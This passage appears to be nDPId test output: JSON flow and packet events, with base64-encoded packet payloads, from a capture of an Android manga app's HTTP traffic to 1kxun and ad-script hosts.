Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1653,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385140836,"flow_last_seen":1654385141022,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3231,"flow_avg_l4_payload_len":1077,"midstream":1,"thread_ts_msec":1654385141022,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 04379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1654385141023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2946,"pkt_l4_len":2912,"thread_ts_msec":1654385141023,"pkt":"nLbQ0+MztKXvZygQCABFAAt0wP9AADQGCMyhdQ0dwKgCfgBQsWi9CdhRUtBIV4AQAOt9HwAAAQEICpcRGLS6xhaMSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vamF2YXNjcmlwdA0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkxhc3QtTW9kaWZpZWQ6IEZyaSwgMzEgRGVjIDIwMjEgMDU6NDY6MDEgR01UDQpFVGFnOiBXLyI2MWNlOTkxOS0yZWRhMiINCkV4cGlyZXM6IEZyaSwgMDIgU2VwIDIwMjIgMjM6MjU6NDAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTc3NzYwMDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCg0KNjAwYQ0KH4sIAAAAAAAAA+y9a3cbR5L3+f75FBB6Vg2MIIikLrZBo3lkihprW7cVKXt6aQ0bBIokWmAVGihQ4pD87vv7R14qCwAluZ+Z2d5z1sdHRGVl5TUyMu5x52SRD8txkbey9lX43ShbeftqfNKaHeYf2rOsXMzyhn53s8\/TYlbOty8Gs0bRV1H\/ypf1rm4641Ev70yKwSgb9e5s3mz7TzN9OhxMJq0itNApOtXvss2D+6x\/Z6N6caNu8v6ncT4qPnU\/ZcfTwfDj\/zkv8un2mrJ+GH5r3BkwmWLW0veLzrwz7G90Jv3DD9vDH8fdSZaflmfbw3v32vP++HD4oVMczj\/cvTvpThfzs+5gOp1ctiZWyLh41d\/YVmOLxjhv0LAanfYHh4sP2\/NP43J41iovp1lx0pi2r4aDedYsjv+WDctmL6NKNajSfZn3y+58Mh5mrc12Z9YvDzc+hGWK4y9ZnXH7KjucffDDKc\/G886hlbOSRT4caIvaNzetaXv7eJYNPm5b16EJ3\/nUvxtlJ4PFpHQjyg6nH25uNKP87t3cFmt7ElalPenOz8YnZavtNixfTCadsr0NMAwYagUMGyxLp2xttG8MGGZ9tr\/oX230NuK2l92smn7WcSC10e\/3i8MstpSv9HNRjEeNjTu+muraxjDf7Wwyz65U0geifL+jYrg4z\/Kye5qVe5NMP+c\/XR4MTl8PzrNW8ywbjJptht4Z92PVIStWZr52qzkfzsbTssksu9rKfrPMPpcP\/ja4GPg3nXF3eDaYzbOy31yUJ\/e\/b1IymF\/mQ8HruDufDdnW6b1m8152r9k9XuSjSdb927zZmWkDs3y0ezaejFpjdqxTds\/7Gf8O+zP+nfabTbeOrbB5dhQ99JYCuqzN8r8xqOpOZ0VZaJTds8H8zaf87ayYZrPy0i0j7bbbdajMDssPHjBDB81eAjIVtJZfhVbaYiVXAZZuO0X7yibL4XHQaoVL0GqDWQFKOs4O9erDTcAYN63DMNqWGgJ48tZWu5O3Njd+0J+H+uc7SrKAUvp56\/HDrfZNp7P8ZXMxzxrzcjbmVG6n9b97SPUv1g4vGzPtShjd3btZ9+gom78qRotJtpP1rpr+iHHwbm7K5KUApOyCJ87eFYsy48R3zwcgjbeD8ozf+4ZB9KMclONhrFP\/wft32Wg8A63wky0\/n+rHq+y8mF36qu7YeMyct548fNQG5Getot0ZsDRPHj5udxY8D9qduT0\/aYMXZ615G9TI2j4GH015nrQ7Jzxvam1HPJ+0O2dW\/7t254Lns3bn3J6\/b3cueT5vd06tPjtyzPNpu3Nk79mmXZ6P2ttLIx13\/WKxMH4ui6QoznSYFmrx+tPlkll\/lBTV1vAifeFW+TIpqjbhOClN9mk3FH8NoFIQEaR2Zh0uoA73jt2hRYvr7Q7Ao3tjKETqdgo8WLaH\/Tz71NibzTjuzVfjfHwyzkaN7PMwm+pSbhTD4WI2y0bbDYFweZY18iK\/fx4qjrKLRpZfjGdFLrzXAKlbpROwdiNTq43zbD4fnGaNQT5qDEajsZodTBpn2WRKrcanwSwf56fzLtjPsKtGyVWZzOIDYLGxnY607M6y6WTAHfbg\/5g\/OK1OUDwhk8PpvXsfbtqAWDcHD\/ebL3JaHg8Y5C\/jYgKsF3nzpjybFZ8aw+7JjDrzg+JtMe1vdoY3dvEXyeXRvrpJDu6MLfnKKdc0ZoDhow3u8P4s+bion\/j2VQ07xM10BFHAwv3B7NRumbm\/KO9vdvJ+tWPvssGw9Cv+B7sEthsX4\/m4bJyV5bT34MEJq3VcFB+7p2CCxXF3XDzgDhqWD7iT5g9sq+6PsmExymbds\/J8sjMO69WnOQiFje3Zj+X2DKIlv9dv3mU888MPepfro\/fvXuyCFIocKGjFsR7O7m1+aG\/rgzpoBKAAPr4ZriqYmn8dmAIaisDN5e02u\/gCPED51SGhuEmwtTY9bI\/uhC\/uHMdMpAuHLLu+jgcua7tB6NAdcIf6g+ev1sF8Pj7NG8NBnhdl4zjj12TCcRRSaKi1htYrB3mN8wyiItBt7nPuh5swPG6L9lU5uxQNfafWuieg7mzaCmV2\/Pe5mfLTVnNwPBQNctLKDh+ztaOs2Wk+bjIF3wIETnLhi7yZ02lFldFoIHpLkWM5QJP\/uMk\/QE152Dxq3nNdscrF+S4EzS6gA131oZ\/bcGZf6qlsc3FNa0SKvw5LCLIbG3hzY3Pr4aPHT777\/ocmBNys+7dinLeazXZ92tCJgUjUpFnQ07Px3z5OzvNi+vfZvGx259PJuNSHXWa0N4DGDkura9gowOym3Vn\/dbViH7PLeSCc3O62RKa223FgN1DStA617SYD1+KRz9pF3788Py4mcy5W\/\/o2cow7d6UGdY1UezHfy0Ems8HxJEsQEzCz479xY+1Vcxa0h72d6WoBtWW6vzdhaeJ5D0S8WJursJkJOhiCDEIrExGWszaErfiyWWfSvnu3NT+cfICrm1APMISiW\/SL1qz6SBfB9MdF6Acc3x6EBhawFa4N\/VIz9heK14PJHNp36QiLrFuPfiG3NGf\/6abOcTcHWnVqRX1xFp6WnJtjyAJIEt77U1S2r6+\/X6muT38ZTBYZb5oNw7z3ReT3Gs175b1mo\/mtH2VQXpfxq+rAF4LLsLbldslwj2bQ\/RmXd8TM2+2sDw53\/HRWfTx2k9WdlbPgGSi7e3RWzMvXDLtfdsrDc45oVX+gzlTbugkVt0t2cJRNshJKgS+gjKtGhL4S\/LRwPQo9tah2Mhmczu9eiKXY5bAxZLEr6n3eDmxrOiG9ZXYAedk9GXNirf521gsrYLxyLrYlX+JTWgvfIiAMfwwIF5Cg3aNRcf7imaBOnN\/QreW2Rs3jYHvQH3Rz9mt\/fDwBV6phKNnOkLbGrTns\/jZMcTnOF1kju5m2mg+3mry84fpwc7vur50cbLAXfzSESoWuM1bOY6uGfscDU0p+cMeKrCKsG+ICvoK4604HLIdtV\/hWQ9\/OAIPqlfHctskdCBI2awbbQ29Uo7Fi2mq3c+MJnYTi7t0F5xJg8ACTAMCwAgCNO9aw5QIMYEACVOgo7JQ9Daea7MRPtroYqw92tHwPm+2ee5lCUZhbAljLy1O1s92uVsh\/8NZWacc13FM\/j5owcDorGq57bS3CMngxTbU2gtmk5zjrpMxQ91TcCGSfuJjv+Dvi7xaMIWxMCxaRF90Xz46eHhy8e\/HT+4O9o9dPX+2JtRnB1zSPOLWQZS9yWDXo5Bf5vBzkw+xfmvdewbB1Z5DRxTnCkbLw+Obhk7aX59DDZf8KxLQ7KebZnDbct8+5bHWUevMOL1dKhyrVe9ULb3uTzhRuT2exOoq9RSy09sYdgFdV7GmQUsiXS0zL"} 04370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1655,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":3,"flow_last_seen":1654385141023,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2946,"pkt_l4_len":2912,"thread_ts_msec":1654385141023,"pkt":"nLbQ0+MztKXvZygQCABFAAt0wQFAADQGCMqhdQ0dwKgCfgBQsWi9CeORUtBIV4AQAOt9HwAAAQEICpcRGLW6xhaMEpp1mOZOq1lRM3AjoFakWE6ydn19x4vYgtBktaRbE6NImoX8K38\/z569eYUc0P3+tZh9zGbzXtLVndCVe+cr7l1wgl6O52WWqz6yqTutMAYYl9pr3vnRDcqSFbCXXIfW+y\/j7JOklNZEqIcgJwNhjecvctdr706eLphjKXQ\/hf8CZhCmXLmntICwF3bGo\/zhapQdL04PimLSm7m77tvpVX\/GY6fx6kOc4DpLXkE8dcuzQfnObhIQKWKm5Pn5ADEZQH9HEsb0xcGMC5ByDkWt\/DXzoFzTWXpzgNyxn\/TshykBz029jaeeQapqg0999ewmkdKw0rHBdUsbXhoN\/Qa5B8fxHZxRPhxPsgMO4JwCuMe7d\/cCJpm0mtCdzeR+K0R\/M0gYVXjlcjyYjP8z\/bjV7thrZCrlZbyf5y9NNGz76t6LODpG6Px\/LTKW7kRkx1v2NxuFBjikKyPrf2HUSQtsQ4WRjQRAdoDgV8Jrv3CQhJ297rFI1Gz0fjpCaAm+NyGDq1g1MHA3eljx7tF5scjLNzMokPtcB9VT9QkItSIj1q7Edsnte+pR8Y4t8yOklZ1QFC+J0+6cEyfZ0vG9e\/FOcAxIafyH0Suz\/imCWzHk3SNJRbnKd\/0Kz4HplTJ3wgT\/Y5EGZygJOF\/Tl9lFNnln1BUyFr1GsKXvTViSBzGwCXO747mBUPjs15kEsjNuX75ZQ6NJaNa0LxoLW3ARewttm8mTQTJFPgcCuuUY8TICXcZ10aVFSJ9zt0UvTl5nQ4ldZpe6wIHBVRjpHNPR3btpY3u5BMRwJ4GImkNtz39EM+IUFnOo7cyo7QiR3Sz\/uyCzJTUF51HguYBCGoZ7BJJimcapgdZ4\/pOAi33w0LXTOo10je5pz0Vzx7rVsOqvF+fHtoTrivvH9zbbbQ8ZK8A7h6CpIBA6RlT+ZWuPbVoaScftgh8X0vbBtNfYHeR\/RM7iZo0YoqFi49O1JqagabCmIu0bn84gvt2okVjMJDoTV89cG\/5EIfTqHMU11FCQWN7ZMIQrhCgqwqgJRJuiJrYeenLiCX8lFN2SUPWCH9+BaiUV3dw0KsDIjFMIRiSiG4hD64iDPjY7ew7LfOpfVQiqYvg89lp7KOOBvOkMRWl821fpQWaPxWAjv0M2LSy5tp925wDw6YWz3t\/gTvv8xeHWsCVgj76khYB9\/Sjrldmb8cnlU1hRqUje9g8\/dT5\/2J6iMIwcdue8I+oquQL8WZ6nK+DB++1NB+alnC2GZTFL398+X7chJ4x7kqHGMy1G\/bj5S6M2cvfVlzB+rb11uMA3u+6VtX7T8eilmoe\/OP1kzwP+cby4puj2dV2Toe7tNTqu9RsELKMupJduPE7NQYFEYFvY9qAfLmmuWWGr7QAk19e728YdhQKHnrN+kVx8MDxhEK1FR1QHSAHZX1goMARIdbd9pYNiHZb9o+3lU1QiD4gwA00fvi4BoJvORwGq1LDv1iDfZB3RstaoiCeghC9sZh9SxrUbsBVsALfy6eUX2vyONpthxZCLeUI7W7rY3f36fcV5NREYA4p5+skKmnRf\/VB9tccYbzpv+le3Uk7GDHY8DvT4tTfueKzqCmBWTibwtzbNSHv0Dvzsob96HzuGk4cpGf1mWUi7QjmHdZBCzWlLIq6bT3UX7Rb5yfhUGlJhpqMS6ZbjmiQIUVGO8uAiM5Lfyy2Lvr3QZepPfNcYOAndIzEy1u1QSHJQLIskxl4kgbTrcPxhe7Gj5vjVXyAc7TXdECSIHdubrivoz3qhXk5luzWgxQHnO\/08KI\/ezqBVuI9GO6tFvRyglW1FkEwB7f5Ez11H4\/kzp7mPzSAHSSh9EfQ2CK7PL9c0nsCt33iO0m06ODUdzH5ZQA6N6s1WlW1ShS42rsAxf3XzSZ0ovcpC\/DRavgq2IxNJD58vO4fN0TjdVOTZyX7ylGwlT6tzsMLV0aqd0HLkGNPCQP7Mmx+k7bzSiXNQ77bO\/fbU4oFBWK+2sOKIOrZzb5GJ+W+PF8dIbGFN9RJec5hNJML1DUMOon88n9YQgd9ORy3a6+vrZ+ALcNcnXY2IvmWYEbfXtTWes7EwwljT0NXNNjLY5Bq8QjIgmPIbXvUXDtJSm1A0hkSRpCwdHxNCgYtr7e0sF7Q4Aov8IyOuYaIEdCGmReVWoCzO0zpb3dI6pAmAWYY5UJhsczol3Te3jnzpO4a+VHLL2N3m\/WT7aYNPC1ivOPpkUGtPih8\/9\/McyUU6bj\/9t+4N27U6ca6SefW+DoDuCK4nYZIl+TLK88YjhqWwsRAwRXToeLMoyjcVkbDeAgbNVdX9P6sQaX\/O02BxKkXz7gQNRUUEgKuDlFh9IQgKWB76QMKKaTBaATHG3waU4BJ0cTNAfACnFN\/JrCM+9GuvZP4U0Dy3RJaMsJB2J68KRNBn9THntUdZ8aT0TUbBSbGYBWGG8fozAHSpHhr+dfXozBvD9ZekHGvlb1ceAflTXn2cm6IkCKL4e\/jk8fedTWyY4ro6Eq2uPBFcLC191WYQcKUtLI1qyWwFGSyL8xL7KYi\/fXb8rNrWKNtpPtC9CFuKNvGpzMEwhqHsHnQSdm4oaGDWf28D3fnimE8xkMOYJjQDijwZf05GIJjz6FU2ZVkXK8Hs85sTzC2EB1wTQYyctgQDMRY9+41Tyjz\/fX\/T2vVsE09ucIj355kZ81QrG6Uq19eshQwFMATTPxAqcZjNP6DsLWDL7m+aKoDlcmPGYEfGPf4Jc8i2o7rH6cc7lfp5HNow00LXBnKEWhtQOBQ4AwNsBWSScgW1dSbbjF7ZmWeD2fCs19zRZuY7zSbiW+49Sv6gkplKJNLEaG0my7nb5ouyw7XJnNkDa5WZm63aGbOPxgqt0pYmyvCR5tE5E+FHq8BewY0kAatco7uXg5Ko+gfTLvuqbohJ1ZmGfW8GS8GQq125VYxbr4L5jsnWOgtjZILlzlwCqKgvKTEd\/We03Bk6yx0\/gQ9YdiFCSkb6dcud4eHEW+6I0v6K5c58yV4DFW+q0P7K6od1d7Z1LO95PDim6zUgQjhlukYtf+6PYpSQObOYUGzWMVgfdnIMZ42vdDZNZrtxR1Aow5opFdzPtiFevZC86O7dkb3R71Rohj5WqIb7KOr4oHXM\/MlUMy0xoiMuIkCTc3UTZ+W1uudgozAJJ1orQR32Tc021DWTfO8luvpeA++XaMzcd4yn6sarclVNQ6faaF21OVexR5dGmmjMNgiJNavWTLPo6l2pSi\/rhMH3EGdpII5GVV\/+V7EPns9Pe+y+riCTnD1GMGais81H3p7wCRyEqeIeYTh4hpnXRX9zUyq3SgcVWeOgc+KoYymBrBEs5Lnm8KobfmCDiYnPulbywcUYLqcQxtBVlJ9WzcR3XQygZk9PIWru3n3w2\/He6DT77cFvowcs5hwb69BEVU1avpPEHMWhFbd7tqAHMBsgzYvr69XCM4ZSOPNwqiTvtQsoFV8Wn7LZrqRPMqUQwVbVogbM1FC2XlXTSSENTgxS2jsox430GedMrvwpQ0aDPMvBKWbjPQBk\/SsD4TbGPENf4QC1mfu+f4ktXwr4v2IWpdf9ghcmhrbz0B+Hx58PXr2EdvMvDwSci4REGv4O9FBd9q3sbilzj7JiTSHXx161e\/Xq\/f7B0fv9vaO379683Xt38JfeZufnp\/tHP71583Lv6eujX56+fL\/Xe2Rlr9+\/2sNuzpd9b2Vv3+y\/OHjxC1rh2sst98WbX\/bevXzz9Nnes6UGH255wQiqz7fezMcJMiqeICpbxobYfLVxNr++hmwdgIb4OBq1CCBsu93r+brX9uHQvQm92nf2YuJevFrIsrjIX2XlWTGy1sDR"} 02796{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1654385141035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1787,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1787,"pkt_l4_len":1753,"thread_ts_msec":1654385141035,"pkt":"nLbQ0+MztKXvZygQCABFAAbtaqFAADQGY7GhdQ0dwKgCfgBQsXDoMXIa8ixAboAYAOt4mAAAAQEICpcRGMK6xhabSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vamF2YXNjcmlwdDsgY2hhcnNldD11dGYtOA0KVHJhbnNmZXItRW5jb2Rpbmc6IGNodW5rZWQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkxhc3QtTW9kaWZpZWQ6IEZyaSwgMjMgT2N0IDIwMjAgMDM6MzQ6MTggR01UDQpFVGFnOiBXLyI1ZjkyNGYzYS1lMWUiDQpFeHBpcmVzOiBGcmksIDAyIFNlcCAyMDIyIDIzOjI1OjQwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT03Nzc2MDAwDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQoNCjU0YQ0KH4sIAAAAAAAAA51WS2\/jNhC+769g1AUsJbaUpOjFiRZIt9giBdotmiA9eFOAlmiLsUwKIh3Hzfq\/d8ghKTm2i24vEkHOfPN+rLko5Tq9L2hJchLPVqLQXIo4Ia\/vCHmmLaklLe+4Zh+lmPF5S80zkAbKBdsMSUHrekqLBbIh46qtgS6qtG7GWaZBQrpmpaylXKSFXGa04ZkCYBVdgSjkKammwPQKoGMCny0+vU\/pE32JAXFo9TLkhnRMfrn7\/FuqdMvFnM82sblMhhaOkCXTlSzHZPD757v7gb9tWlkwpX6y7DNaK+ZfCik0E\/p+0zBgok1T88Kamz0pKQYWdZukpRSsc1TLVCOFYt5yEnwRhyc0YpuYv7XI+\/VHKgRrHxjEoFV7Tl3zUldDUjE+r\/S+jw8FJrbRCLEBiyBmKwxapyGfxSc7T+TrV7J7kz47pY6+pFOrfEJaplet6MyePFpDTYyMnR4oJzsivQAHgy7a4fjEa81aZvJy8ujfZ7KNDSqH2\/Mr+F17AWnNxFxXcHd21pnaRwQWp8yEB0AkWFJdVMyEAClS8GNqL+Psr\/hLeZZ8ObW\/cZyeJlkwkBDwpWPuC7X3Nn7kJCcNbRW7FdpTTi4ek8S4Q3OxYt404zBAw3AfZLs8xtYpDRY4dSbf92wEK208U9QpJ\/bfl+zenfTcZd0+hfJhSZuVqmJk6\/lj64rP\/99mBzIEFMf5pjZaKsobUf7BlvKZ3TxY1cGykNcOxHscvOZuXBKQHLIjZKZY1TUacpDwIhA6kMm581yXviEx1M6jlprWf9r6BIpzFPKtKdoHOfMJqCBFoV2aykdU9KfRCG9B3q9UV+kM+mkb26PxmlxC6z4lPUzn4W\/VykkZHVUIUxxtv7bufnWh98nWc9pOvWFnSZXpryzmQ3LRy59py+gCTYZmiT3Xfl0iYYwMwdZ8jENMI\/xZynnNsJ\/emJYRcoXVbAld\/baEDlpzOA2JqiV8bQn49upT6X08+G5AzkjgStJKL+t4cM2FAgCqVB7RUk03cysxIkBt9SNkoPSmZnlUcjCNbsZc1Fyw0bSWxeLKShsbaHuC\/6B5ucJys9eu8uz9DqqZaSNajlD7PDIYeDYgB0mNgUhoTntkJPswcC6HitAw7+SM9Iwy5ROtRMlmoH8Zed8QAt6ZynIzSFKYjhBGcIsqWt5oQtVGFES1RR5lWUPnjJaXKboIXko3SO3cx1eYqVlPZPqkog\/XGaIF7TC+HMZy+0zrWxPXrpghAfsPimlosZawm86d6jZdD5gK7fmgqaYbFzWjbQDtpPXSlZC4ZwXot8aFqn8JIxRmIvbLV+x0Bt2nN\/yH5Ifzc4e6hdxTLKw5\/xPeVM5OgXyEYlt8km3BjpbH37DY3JbeZf+pEiAPiwW0lgLirSLiU9UgYf4hps1ACC\/UUIjtAfzDSWWClkeavejsiT5TTJHI51pRCtjIVlOocvqSCgZECuRwfSijgkfcvhuahF2bQs0f6Q264sosBhBl+GKPsndY0TtD1d4fHKb2JYgCrHAOTc1ol8KeCl0cbE9NfwO6oKyPkLnHjveALTX2Gg5Jp5c7oy7DDsUNOw9GyLriNYt1u+rtsliASAoqHJrLfvT2igKaygnyJGSnn9sixBe3\/0GryWHXLpdyOuhUMcVhOrtbZUCyY9pZywo6albTkdnOhnY56+9lVtSJAzi8bO3PDXRgCMjQKwALW3e+hPMR9\/Z8QN5a7uo6rCA7Dujq6I0XjI790t3TsHPMvwp3I8oN1HQKXcpCJZbL1oUbsCb5rt5tkxhe\/gG\/wmXsHg4AAA0KMA0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385141046,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"flow_min_l4_payload_len":426,"flow_max_l4_payload_len":426,"flow_tot_l4_payload_len":426,"flow_avg_l4_payload_len":426,"midstream":1,"thread_ts_msec":1654385141046,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":492,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":492,"pkt_l4_len":458,"thread_ts_msec":1654385141046,"pkt":"tKXvZygQnLbQ0+MzCABFAAHeDJVAAEAGB\/rAqAJ+EkBPJaGuAFABgVk3JTRLIoAYAfYmXAAAAQEICqYAsEjS\/CtTR0VUIC9kb3VibGVjbGljay9jYTBlY2RlMi5qcyBIVFRQLzEuMQ0KSG9zdDogZ29vZ2xlLm9wZW4tanMuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6ICovKg0KWC1SZXF1ZXN0ZWQtV2l0aDogY29tLnNjZW5ld2F5Lmthbmthbg0KUmVmZXJlcjogaHR0cDovL21hbmdhd2ViLjFreHVuLm1vYmkvDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCg0K"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385141046,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"flow_min_l4_payload_len":426,"flow_max_l4_payload_len":426,"flow_tot_l4_payload_len":426,"flow_avg_l4_payload_len":426,"midstream":1,"thread_ts_msec":1654385141046,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"google.open-js.com","url":"google.open-js.com\/doubleclick\/ca0ecde2.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1658,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385141046,"flow_last_seen":1654385141046,"flow_idle_time":7580000,"flow_min_l4_payload_len":426,"flow_max_l4_payload_len":426,"flow_tot_l4_payload_len":426,"flow_avg_l4_payload_len":426,"midstream":1,"thread_ts_msec":1654385141046,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"google.open-js.com","url":"google.open-js.com\/doubleclick\/ca0ecde2.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01078{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1654385141075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":520,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":520,"pkt_l4_len":486,"thread_ts_msec":1654385141075,"pkt":"nLbQ0+MztKXvZygQCABFAAH68DMAAPgGrD4SQE8lwKgCfgBQoa4lNEsiAYFa4YAYAIOtmwAAAQEICtL8K4OmALBISFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2phdmFzY3JpcHQNCkNvbnRlbnQtTGVuZ3RoOiAxNDcxDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDA2OjE4OjEzIEdNVA0KTGFzdC1Nb2RpZmllZDogU3VuLCAyNyBTZXAgMjAyMCAwOTo0ODo1MSBHTVQNCkVUYWc6ICJmZGI1MmNiYTkxNGQxMGI3NWI2YTY2ZmQ1NzVhZmFkMCINClNlcnZlcjogQW1hem9uUzMNClgtQ2FjaGU6IEhpdCBmcm9tIGNsb3VkZnJvbnQNClZpYTogMS4xIGI0ZTZhMTMwMWExMTQzOTM3MjMzNGFhMTRmYjdkMzEwLmNsb3VkZnJvbnQubmV0IChDbG91ZEZyb250KQ0KWC1BbXotQ2YtUG9wOiBUWEw1MC1QMg0KWC1BbXotQ2YtSWQ6IGM4c2hiWWJFVnhFWWhjaEN4c1d5LUVhTDNiYzl2V3g5aUl5clpkVFEyYjVfeXZneTlRdTBNUT09DQpBZ2U6IDYxNjQ5DQoNCg=="} 02378{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1654385141075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385141075,"pkt":"nLbQ0+MztKXvZygQCABFAAXI8DQAAPgGqG8SQE8lwKgCfgBQoa4lNEzoAYFa4YAQAIPvVgAAAQEICtL8K4SmALBIZnVuY3Rpb24gaGF2ZVNjaXJwdCgpe3ZhciBhbGxTY3I9ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoInNjcmlwdCIpO2Zvcih2YXIgaT0wO2k8YWxsU2NyLmxlbmd0aDtpKyspe2lmKGFsbFNjcltpXS5zcmMuaW5kZXhPZigiaHR0cHM6Ly93d3cuZ29vZ2xldGFnbWFuYWdlci5jb20vZ3RhZy9qcz9pZD1VQS0xNTQ3NTc5MjktNTciKT4tMSl7cmV0dXJuIHRydWV9fXJldHVybiBmYWxzZX1kb2N1bWVudC53cml0ZWxuKCIgPGRpdiBpZD0nZ29vZ2xlYWQnIG9uQ2xpY2s9XCJndGFnKCdldmVudCcsICdPbkNsaWNrJywgeydldmVudF9jYXRlZ29yeScgOiAnYWRDbGljaycsICdldmVudF9sYWJlb